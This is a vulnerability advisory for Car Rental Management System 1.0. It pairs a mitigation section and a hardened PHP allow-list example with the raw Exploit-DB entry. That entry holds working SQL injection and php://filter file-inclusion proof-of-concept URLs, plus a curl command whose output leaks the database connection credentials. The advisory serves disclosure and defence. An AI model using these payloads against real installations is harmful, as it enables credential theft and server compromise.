Vendor: Car Rental Management System
Author: Mosaaed
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection / Local File Inclusion
CWE: 89, 98
Product Name: Car Rental Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Parrot + Apache/2.4.46 (Debian)
Year: 2020

Car Rental Management System 1.0 – SQL Injection / Local File Inclusion

Car Rental Management System 1.0 is vulnerable to SQL Injection and Local File Inclusion. An attacker can exploit these flaws to read database information and execute malicious code on the server. The SQL Injection is in the id parameter of http://localhost/carRental/index.php?page=view_car&id=4. The Local File Inclusion is in the page parameter of http://localhost/carRental/index.php?page=about and http://localhost/carRental/admin/index.php?page=movement. The Local File Inclusion proof of concept uses the php://filter wrapper to return the base64-encoded source of an included script: http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home and http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect (the latter exposes the database connection details).

Mitigation:

To mitigate the risk of SQL Injection and Local File Inclusion, the application should use parameterized queries for the id parameter and strict input validation (an allow-list of permitted page names) for the page parameter, so that neither value is ever concatenated into a query or an include path. The application should also be placed behind a web application firewall as an additional layer.
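Added example (not the project's own code): a hardened front-controller pattern for index.php that resolves the page parameter through an allow-list instead of including user input, and fetches a car by id through a bound integer parameter. The pages/ directory layout, the cars table and its columns, and the $conn mysqli handle are assumed.

```php
<?php
// Added example, not the Car Rental Management System's own code.
// Hardened dispatcher for index.php?page=...&id=...
// Assumptions: page scripts live in ./pages/<name>.php, $conn is an open
// mysqli handle, and a table `cars` with columns id, make, model exists.
declare(strict_types=1);

// LFI fix: the include path is never built from user input. The request is
// looked up in a fixed allow-list; php://filter/..., ../ and unknown names
// all resolve to null and are rejected before any include() runs.
const ALLOWED_PAGES = [
    'home'     => 'pages/home.php',
    'about'    => 'pages/about.php',
    'view_car' => 'pages/view_car.php',
];

function resolve_page(string $requested): ?string
{
    return ALLOWED_PAGES[$requested] ?? null;
}

// SQLi fix: the id is validated as a plain digit string, then bound as an
// integer parameter, so `-4 union select ...` can never reach the parser.
function load_car(mysqli $conn, string $rawId): ?array
{
    if ($rawId === '' || !ctype_digit($rawId)) {
        return null;
    }
    $stmt = $conn->prepare('SELECT id, make, model FROM cars WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $id = (int) $rawId;
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

$page = resolve_page((string) ($_GET['page'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
$car = null;
if ($page === ALLOWED_PAGES['view_car']) {
    $car = load_car($conn, (string) ($_GET['id'] ?? ''));
}
require $page; // only ever one of the allow-listed paths
```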

Exploit-DB raw data:

# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include
# Date: 22-10-2020
# Exploit Author: Mosaaed 
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: parrot + Apache/2.4.46 (Debian)

SQL Injection
#Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4

#POC 1: 
http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users--

LFI
#Vulnerable Page1: http://localhost/carRental/index.php?page=about
#Vulnerable Page2: http://localhost/carRental/admin/index.php?page=movement

#POC 1:

http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home

#POC 2: http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect

Note: POC 2 reads the database connection information.

#example : 
curl -s -i "http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect" | grep view-panel -A 1

#result

<main id="view-panel" >
        	PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K

#proof of concept picture

https://ibb.co/8Dd7d9G